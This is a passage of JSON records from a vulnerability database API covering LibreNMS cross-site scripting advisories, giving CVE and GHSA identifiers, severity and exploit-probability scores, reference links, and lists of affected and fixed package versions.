"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-10-02T12:58:50Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-fc38-2254-48g7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82814?format=json","purl":"pkg:composer/librenms/librenms@24.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.9.0"}],"aliases":["CVE-2024-47524","GHSA-fc38-2254-48g7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2w1a-3ym6-hygb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56215?format=json","vulnerability_id":"VCID-2z9m-fwyr-17b3","summary":"Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/edituser.inc.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Manage User Access\" page allows authenticated users to inject arbitrary JavaScript through the \"bill_name\" parameter when creating a new bill. This vulnerability can lead to the execution of malicious code when visiting the \"Bill Access\" dropdown in the user's \"Manage Access\" page, potentially compromising user sessions and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49759","reference_id":"","reference_type":"","scores":[{"value":"0.00546","scoring_system":"epss","scoring_elements":"0.68205","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00546","scoring_system":"epss","scoring_elements":"0.68213","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00546","scoring_system":"epss","scoring_elements":"0.68206","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00546","scoring_system":"epss","scoring_elements":"0.68204","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00546","scoring_system":"epss","scoring_elements":"0.6819","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-49759"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/237f4d2e818170171dfad6efad36a275cd2ba8d0","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:52:28Z/"}],"url":"https://github.com/librenms/librenms/commit/237f4d2e818170171dfad6efad36a275cd2ba8d0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49759","reference_id":"CVE-2024-49759","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-49759"},{"reference_url":"https://github.com/advisories/GHSA-888j-pjqh-fx58","reference_id":"GHSA-888j-pjqh-fx58","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-888j-pjqh-fx58"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-888j-pjqh-fx58","reference_id":"GHSA-888j-pjqh-fx58","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T16:52:28Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-888j-pjqh-fx58"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-49759","GHSA-888j-pjqh-fx58"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2z9m-fwyr-17b3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/110202?format=json","vulnerability_id":"VCID-3b6p-2q4u-kkb5","summary":"Cross-site Scripting in librenms/librenms\nCross-site Scripting (XSS) - Stored in GitHub repository librenms/librenms prior to 22.10.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4067","reference_id":"","reference_type":"","scores":[{"value":"0.85276","scoring_system":"epss","scoring_elements":"0.99377","published_at":"2026-06-05T12:55:00Z"},{"value":"0.85276","scoring_system":"epss","scoring_elements":"0.99379","published_at":"2026-06-09T12:55:00Z"},{"value":"0.85276","scoring_system":"epss","scoring_elements":"0.99376","published_at":"2026-06-04T12:55:00Z"},{"value":"0.85276","scoring_system":"epss","scoring_elements":"0.99378","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-4067"},{"reference_url":"https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T19:56:31Z/"}],"url":"https://github.com/librenms/librenms/commit/8e85698aa3aa4884c2f3d6c987542477eb64f07c"},{"reference_url":"https://huntr.dev/bounties/3ca7023e-d95c-423f-9e9a-222a67a8ee72","reference_id":"","reference_type":"","scores":[{"value":"3.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:N/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-28T19:56:31Z/"}],"url":"https://huntr.dev/bounties/3ca7023e-d95c-423f-9e9a-222a67a8ee72"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4067","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4067"},{"reference_url":"https://github.com/advisories/GHSA-qch4-jmf8-xvp7","reference_id":"GHSA-qch4-jmf8-xvp7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qch4-jmf8-xvp7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-4067","GHSA-qch4-jmf8-xvp7"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3b6p-2q4u-kkb5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42408?format=json","vulnerability_id":"VCID-47n6-dbkp-gbb5","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\nA stored Cross-site Scripting (XSS) vulnerability was found in librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0589","reference_id":"","reference_type":"","scores":[{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07936","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07983","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07969","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07927","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07908","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00026","scoring_system":"epss","scoring_elements":"0.07959","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0589"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fa","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms/commit/4c9d4eefd8064a0285f9718ef38f5617d7f9d6fa"},{"reference_url":"https://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/d943d95c-076f-441a-ab21-cbf6b15f6768"},{"reference_url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://notes.netbytesec.com/2022/02/multiple-vulnerabilities-in-librenms.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0589","reference_id":"CVE-2022-0589","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0589"},{"reference_url":"https://github.com/advisories/GHSA-gj26-g5qf-jrh7","reference_id":"GHSA-gj26-g5qf-jrh7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gj26-g5qf-jrh7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/60669?format=json","purl":"pkg:composer/librenms/librenms@22.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-13ug-m6cb-hbcc"},{"vulnerability":"VCID-1q9d-aqn7-67ad"},{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3b6p-2q4u-kkb5"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-64kz-hnxr-vud5"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-76bn-2u1y-kqf2"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7fbt-znx9-ukaj"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-7srz-umtt-n7e1"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-b67g-878z-sygx"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-kn2w-mmss-s7hu"},{"vulnerability":"VCID-m1hm-kqrc-3kbj"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-qqnn-43db-guek"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w5dm-5pyj-cfef"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-wkt4-vdr8-mkgk"},{"vulnerability":"VCID-x1aq-5a19-yye7"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-y6jm-2987-9uh2"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"},{"vulnerability":"VCID-zech-eg55-gbcn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.1.0"}],"aliases":["CVE-2022-0589","GHSA-gj26-g5qf-jrh7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-47n6-dbkp-gbb5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56201?format=json","vulnerability_id":"VCID-5f5f-pkcz-bfhr","summary":"LibreNMS has a Reflected XSS ('Cross-site Scripting') in librenms/includes/html/pages/wireless.inc.php\nA Reflected Cross-Site Scripting (XSS) vulnerability in the \"metric\" parameter of the \"/wireless\" and \"/health\" endpoints allows attackers to inject arbitrary JavaScript. This vulnerability results in the execution of malicious code when a user accesses the page with a malicious \"metric\" parameter, potentially compromising their session and allowing unauthorized actions.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51496","reference_id":"","reference_type":"","scores":[{"value":"0.01137","scoring_system":"epss","scoring_elements":"0.78751","published_at":"2026-06-07T12:55:00Z"},{"value":"0.01137","scoring_system":"epss","scoring_elements":"0.7876","published_at":"2026-06-06T12:55:00Z"},{"value":"0.01137","scoring_system":"epss","scoring_elements":"0.78758","published_at":"2026-06-09T12:55:00Z"},{"value":"0.01137","scoring_system":"epss","scoring_elements":"0.78752","published_at":"2026-06-05T12:55:00Z"},{"value":"0.01137","scoring_system":"epss","scoring_elements":"0.7874","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-51496"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/aef739a438ffb507e927a4ec87b359164a7a053a","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:18:15Z/"}],"url":"https://github.com/librenms/librenms/commit/aef739a438ffb507e927a4ec87b359164a7a053a"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51496","reference_id":"CVE-2024-51496","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-51496"},{"reference_url":"https://github.com/advisories/GHSA-28p7-f6h6-3jh3","reference_id":"GHSA-28p7-f6h6-3jh3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-28p7-f6h6-3jh3"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-28p7-f6h6-3jh3","reference_id":"GHSA-28p7-f6h6-3jh3","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-15T17:18:15Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-28p7-f6h6-3jh3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74125?format=json","purl":"pkg:composer/librenms/librenms@24.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-rq5b-4ktu-syf3"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u45s-gxaf-vycb"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-wgnu-f2qa-9yh7"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@24.10.0"}],"aliases":["CVE-2024-51496","GHSA-28p7-f6h6-3jh3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5f5f-pkcz-bfhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56204?format=json","vulnerability_id":"VCID-5hwq-6gme-c3gh","summary":"LibreNMS has a stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/api-access.inc.php\nA Stored Cross-Site Scripting (XSS) vulnerability in the API-Access page allows authenticated users to inject arbitrary JavaScript through the \"token\" parameter when creating a new API token. This vulnerability can result in the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized 